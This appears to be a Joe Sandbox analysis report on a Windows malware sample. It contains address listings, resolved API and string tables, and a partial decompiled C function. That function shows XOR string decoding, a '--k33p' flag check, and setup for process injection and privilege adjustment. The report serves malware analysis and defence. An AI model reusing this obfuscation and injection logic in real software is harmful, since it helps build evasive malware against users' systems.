0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x00405955
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00000000
0x00000000
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00000000
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b2e
0x00405b4c
0x00405b51
0x00405b53
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00000000
0x00405542
0x0040552e
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00000000
0x00405bee
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00000000
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00000000
0x0040565f
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00000000
0x00405658
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cd5
0x00404cc9
0x00000000
0x00404cc9
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x00404b88
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x004047c4
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404510
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x00404275
0x00404279
0x00000000
0x00404279
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404267
0x00404004
0x00404009
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x00000000
0x00000000
0x0040418f
0x00404194
0x00404196
0x00000000
0x00000000
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x0040424c
0x00404253
0x00000000
0x00404253
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x00000000
0x0040423b
0x0040401a
0x0040401f
0x00404023
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e
0x00403fb2
0x0040395a
0x0040395f
0x0040395f
0x00403964
0x00000000
0x00000000
0x00403966
0x00403969
0x00403969
0x0040396c
0x00403971
0x00403971
0x00403976
0x00000000
0x00000000
0x00403978
0x0040397b
0x0040397b
0x0040397e
0x00403983
0x00403983
0x00403988
0x00000000
0x00000000
0x0040398a
0x0040398d
0x0040398d
0x00403990
0x00403995
0x00403995
0x0040399a
0x00000000
0x00000000
0x0040399c
0x0040399f
0x0040399f
0x004039a2
0x004039a7
0x004039a7
0x004039ac
0x00000000
0x00000000
0x004039ae
0x004039b1
0x004039b1
0x004039c5
0x004039d5
0x004039e5
0x004039f5
0x004039ff
0x00000000
0x004039ff
0x004038ac
0x004038b1
0x004038b1
0x004038b6
0x00000000
0x00000000
0x004038b8
0x004038bb
0x004038bb
0x004038c9
0x00000000
0x004038c9
0x0040385c
0x00403861
0x00403861
0x00403866
0x00000000
0x00000000
0x00403868
0x0040386b
0x0040386b
0x00403879
0x00000000
0x00403879
0x004036d2
0x004036d7
0x004036d9
0x004036db
0x00000000
0x00000000
0x004036ed
0x004036ef
0x004036f1
0x00000000
0x00000000
0x004036f7
0x00403709
0x0040370f
0x0040371a
0x0040371c
0x0040371e
0x004037b2
0x004037b4
0x004037c0
0x00000000
0x004037c0
0x00403724
0x0040372c
0x0040372e
0x0040372e
0x00403732
0x00000000
0x00000000
0x00403734
0x00403738
0x0040373c
0x0040373e
0x004037a9
0x004037a9
0x00000000
0x004037a9
0x00403740
0x00403742
0x00000000
0x00000000
0x00403744
0x0040374c
0x00403750
0x00403755
0x00403767
0x00403767
0x0040377c
0x00403783
0x00403785
0x00403787
0x00403789
0x0040378b
0x0040378f
0x00403791
0x00403795
0x00403797
0x00403797
0x00403795
0x0040378f
0x0040379c
0x004037a1
0x00000000
0x004037a1
0x00403757
0x00403760
0x00403759
0x00403759
0x00403759
0x00403765
0x00000000
0x00000000
0x00000000
0x00000000
0x00403765
0x00000000

APIs

GetProcAddress.KERNEL32(?,CreateRemoteThread), ref: 004035CD
LoadLibraryA.KERNEL32(ntdll.dll,NtAllocateVirtualMemory,?,CreateRemoteThread), ref: 0040363B
GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 00403643
GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403653
GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403663
GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403673
RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,00000000,RtlAdjustPrivilege,00000000,NtShutdownSystem,00000000,NtWriteVirtualMemory,00000000,ntdll.dll,NtAllocateVirtualMemory,?,CreateRemoteThread), ref: 00403691
GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004036BD
GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 004036D2
NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?,?,CreateRemoteThread), ref: 0040371A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403783
CloseHandle.KERNEL32(?,?,CreateRemoteThread), ref: 004037C0
WSAStartup.WS2_32(00000002,?), ref: 00403817
GetTickCount.KERNEL32 ref: 0040381C
GetCurrentProcessId.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 00403823
GetCurrentThreadId.KERNEL32 ref: 0040382A

Strings

NtWriteVirtualMemory, xrefs: 004035FB, 00403648
rasapi32.dll, xrefs: 00403834
NtOpenProcessToken, xrefs: 00403693, 004036B7
CreateRemoteThread, xrefs: 004035B5, 004035C7
NtQueryInformationToken, xrefs: 004036A5, 004036CC
ntdll.dll, xrefs: 004035D7, 00403636
RtlAdjustPrivilege, xrefs: 0040361F, 00403668
NtShutdownSystem, xrefs: 0040360D, 00403658
NtAllocateVirtualMemory, xrefs: 004035E9, 00403631

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentInformationQueryToken$AdjustCloseCountHandleLibraryLoadPrivilegeProcessStartupThreadTick
String ID: CreateRemoteThread$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$RtlAdjustPrivilege$ntdll.dll$rasapi32.dll
API String ID: 111222507-3799945703
Opcode ID: 797b6cebaf156808a1b1c73312b339e2dcf7772425fb8a8df5124b909e52889a
Instruction ID: d6fc4fe45969fd7e8e5a1e80a5a711af8d5e660b819589561f52a4a0fe520863
Opcode Fuzzy Hash: 797b6cebaf156808a1b1c73312b339e2dcf7772425fb8a8df5124b909e52889a
Instruction Fuzzy Hash: 0151F97020834269D7215B788D8575B2E8CAB06355F208977F1A1FB2D2D7FCD9C1CA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403478 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 83
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403478() {
				CHAR* _t484;
				void* _t485;
				CHAR* _t488;
				void* _t489;
				signed char _t490;
				signed int _t496;
				signed int _t497;
				signed char* _t500;
				struct HINSTANCE__* _t501;
				signed char* _t502;
				struct HINSTANCE__* _t503;
				signed char* _t504;
				signed char _t505;
				signed char _t506;
				signed char _t507;
				signed char _t508;
				signed char _t509;
				struct HINSTANCE__* _t510;
				signed char* _t511;
				signed char _t512;
				signed char _t513;
				signed char _t514;
				signed char _t515;
				signed char _t516;
				signed char _t517;
				signed char _t518;
				signed char _t519;
				signed char _t520;
				signed char _t521;
				signed char _t522;
				signed char _t523;
				signed char _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t529;
				signed char _t530;
				signed char _t531;
				signed char _t532;
				signed char _t533;
				signed char _t534;
				signed char _t535;
				signed char _t536;
				signed char _t537;
				signed char _t538;
				signed char _t539;
				signed char _t540;
				signed char _t541;
				signed char _t542;
				signed char _t543;
				signed char _t544;
				signed char _t545;
				signed char _t546;
				signed char _t547;
				signed char _t548;
				signed char _t549;
				signed char _t550;
				signed char _t551;
				signed char _t552;
				signed char _t553;
				signed char _t554;
				signed char _t555;
				signed char _t556;
				signed char _t557;
				signed char _t558;
				signed char _t559;
				signed char _t560;
				signed char _t561;
				signed char _t562;
				signed char _t563;
				signed char _t564;
				signed char _t565;
				signed char _t566;
				void* _t571;
				signed char* _t572;
				signed char _t573;
				long _t574;
				intOrPtr _t584;
				signed int _t586;
				signed char _t589;
				signed char _t590;
				signed char _t591;
				void* _t593;
				long _t594;
				void* _t595;
				void* _t597;
				char* _t602;
				void* _t605;
				signed char* _t624;
				void* _t627;
				void* _t629;
				void* _t630;
				void* _t631;
				void* _t635;
				void* _t636;
				void* _t637;
				CHAR* _t640;
				void* _t642;
				long _t643;
				CHAR* _t644;
				void* _t646;
				long _t647;
				CHAR* _t652;
				void* _t654;
				CHAR* _t655;
				void* _t657;
				char* _t667;
				void* _t668;
				signed char* _t673;
				void* _t676;
				void* _t677;
				void* _t683;
				void* _t684;
				void* _t689;
				void* _t694;
				void* _t696;
				void* _t698;
				void* _t702;
				void* _t704;
				void* _t709;
				long _t713;
				int _t714;
				void* _t720;
				void* _t722;
				void* _t725;
				void* _t732;
				void* _t734;
				void* _t736;
				void* _t741;
				void* _t744;
				void* _t746;
				void* _t749;
				void* _t751;
				void* _t755;
				void* _t760;
				void* _t762;
				void* _t764;
				CHAR* _t768;
				void* _t769;
				void* _t771;
				char* _t772;
				char* _t773;
				void* _t774;
				char* _t775;
				char* _t776;
				char* _t777;
				char* _t778;
				char* _t779;
				void* _t780;
				char* _t781;
				void* _t782;
				char* _t784;
				CHAR* _t785;
				void* _t789;
				void* _t791;
				int _t794;
				void* _t808;
				int _t809;
				void* _t812;
				CHAR* _t818;
				void* _t820;
				long _t821;
				void* _t826;
				void* _t834;
				void* _t835;
				signed char _t843;
				void* _t849;
				void* _t853;
				void* _t855;
				int _t856;
				void* _t859;
				signed char _t870;
				int _t871;
				signed char* _t872;
				void* _t873;
				void* _t875;
				void* _t880;
				void* _t882;
				void* _t883;
				int* _t884;
				signed int* _t887;
				long _t897;
				int _t898;
				signed char _t908;
				void* _t911;
				void* _t913;
				int _t914;
				CHAR* _t915;
				void* _t916;
				void* _t918;
				void* _t921;
				void* _t923;
				void* _t924;
				void* _t925;
				signed int* _t928;
				void* _t937;
				int _t938;
				signed char _t948;
				int _t956;
				CHAR* _t958;
				void* _t964;
				void* _t971;
				CHAR* _t976;
				void* _t977;
				void* _t979;
				void* _t981;
				void* _t988;
				void* _t990;
				void* _t992;
				void* _t995;
				signed int _t998;
				void* _t1002;
				long _t1003;
				int _t1005;
				void* _t1015;
				void* _t1016;
				signed char* _t1084;
				signed char* _t1085;
				signed char* _t1086;
				signed char* _t1087;
				signed char* _t1088;
				signed char* _t1099;
				signed char* _t1101;
				signed char* _t1104;
				signed char* _t1106;
				signed char* _t1107;
				signed char* _t1108;
				signed char* _t1109;
				signed char* _t1110;
				struct HINSTANCE__* _t1111;
				signed int _t1115;
				signed char* _t1116;
				signed char* _t1117;
				void* _t1118;
				void* _t1119;
				void* _t1121;
				signed char* _t1123;
				void* _t1124;
				signed char _t1128;
				intOrPtr _t1130;
				void* _t1131;
				signed char _t1132;
				void* _t1135;
				int _t1138;
				struct HINSTANCE__* _t1148;
				void* _t1151;
				struct HINSTANCE__* _t1152;
				struct HINSTANCE__* _t1153;
				struct HINSTANCE__* _t1154;
				CHAR* _t1155;
				CHAR* _t1156;
				char* _t1157;
				CHAR* _t1158;
				CHAR* _t1159;
				CHAR* _t1160;
				CHAR* _t1161;
				CHAR* _t1162;
				CHAR* _t1163;
				CHAR* _t1164;
				int* _t1165;
				void** _t1166;
				char* _t1167;
				char* _t1168;
				CHAR* _t1169;
				void* _t1172;
				char* _t1173;
				char* _t1175;
				char* _t1176;
				char* _t1177;
				int* _t1178;
				CHAR* _t1179;
				int _t1180;
				CHAR* _t1181;
				CHAR* _t1182;
				void* _t1183;
				signed int* _t1185;
				char* _t1186;
				void* _t1187;
				CHAR* _t1188;
				CHAR* _t1189;
				void* _t1190;
				signed int* _t1192;
				char* _t1193;
				CHAR* _t1194;
				struct _STARTUPINFOA* _t1195;
				void* _t1196;
				void* _t1197;
				long _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				CHAR* _t1202;
				struct HINSTANCE__* _t1203;
				signed char* _t1204;
				void* _t1205;
				struct _STARTUPINFOA* _t1206;
				signed char _t1207;
				int* _t1211;
				int* _t1212;
				void* _t1213;
				signed char _t1215;
				intOrPtr* _t1216;
				signed int _t1217;
				signed char _t1222;
				int _t1223;
				int _t1224;
				void* _t1225;
				signed int* _t1249;
				signed char* _t1250;
				signed char* _t1251;
				signed int* _t1253;
				signed int* _t1256;
				void* _t1261;
				void* _t1262;
				char* _t1263;
				signed char* _t1264;
				void* _t1265;
				void* _t1266;
				long _t1267;
				signed int _t1268;
				void* _t1269;
				signed int* _t1270;
				void** _t1271;
				void* _t1273;
				void** _t1274;
				void** _t1275;
				char* _t1276;
				CHAR* _t1277;
				signed char* _t1278;
				int* _t1279;
				signed int* _t1280;
				void* _t1281;
				void* _t1282;
				char* _t1283;
				signed int* _t1284;
				void* _t1285;
				char* _t1286;
				signed int* _t1287;
				CHAR* _t1289;
				void* _t1290;
				void* _t1291;
				signed int* _t1292;
				void* _t1293;
				void* _t1294;
				void* _t1295;
				long _t1296;
				struct _FILETIME* _t1297;
				void* _t1298;
				void* _t1299;
				int* _t1300;

				_t484 = 0x4107cf;
				while(_t484 < 0x4107e5) {
					 *_t484 =  *_t484 ^ 0x000000d4;
					_t484 =  &(_t484[1]);
				}
				_t485 = GetProcAddress(_t1148, 0x4107cf);
				__eflags = _t485;
				if(_t485 != 0) {
					 *_t485(0, 1);
				}
				GetModuleFileNameA(0, _t1299 + 0x156c, 0x104);
				_t488 = GetCommandLineA();
				_t1215 = "--k33p";
				_t489 = E00401311(_t488, _t1215);
				__eflags = _t489;
				if(_t489 == 0) {
					__eflags =  *0x412100 - 2;
					_t490 = 0x410723;
					if( *0x412100 != 2) {
						while(1) {
							__eflags = _t490 - 0x410735;
							if(_t490 >= 0x410735) {
								break;
							}
							 *_t490 =  *_t490 ^ 0x000000d4;
							__eflags =  *_t490;
							_t490 = (_t490 ^ _t1215) + 1;
						}
						_t1216 = GetProcAddress(_t1148, 0x410723);
						while(1) {
							__eflags =  *_t1216 - 0xfff00068;
							if( *_t1216 == 0xfff00068) {
								break;
							}
							_t1216 = _t1216 + 1;
						}
						_t1217 = _t1216 +  *((intOrPtr*)(_t1216 + 7));
						 *0x412270 = _t1217 + 0xb;
						 *0x412280 =  *[fs:0x30];
						 *0x412280 =  *0x412280 ^ GetCurrentProcessId();
						__eflags =  *0x412280;
						L68:
						_push(_t1299 + 0xb78);
						_push(2); // executed
						L004061E0(); // executed
						_t496 = GetTickCount();
						_t497 = GetCurrentProcessId();
						_t1151 = _t496 ^ _t497 ^ GetCurrentThreadId() << 0x00000010;
						__eflags = _t1151;
						_t500 = "rasapi32.dll";
						 *0x4122a0 = _t1151;
						while(1) {
							__eflags = _t500 - 0x410722;
							if(_t500 >= 0x410722) {
								break;
							}
							 *_t500 =  *_t500 ^ 0x000000d4;
							_t500 =  &(_t500[1]);
						}
						_t501 = LoadLibraryA("rasapi32.dll"); // executed
						__eflags = _t501;
						_t1152 = _t501;
						if(_t501 == 0) {
							 *0x4121b0 = 0;
							L77:
							_t502 = "iphlpapi.dll";
							while(1) {
								__eflags = _t502 - 0x410701;
								if(_t502 >= 0x410701) {
									break;
								}
								 *_t502 =  *_t502 ^ 0x000000d4;
								_t502 =  &(_t502[1]);
							}
							_t503 = LoadLibraryA("iphlpapi.dll"); // executed
							__eflags = _t503;
							_t1153 = _t503;
							if(_t503 == 0) {
								 *0x4121c0 = 0;
								L86:
								_t504 = "_Classes";
								while(1) {
									__eflags = _t504 - 0x4106e5;
									if(_t504 >= 0x4106e5) {
										break;
									}
									 *_t504 =  *_t504 ^ 0x000000d4;
									_t504 =  &(_t504[1]);
								}
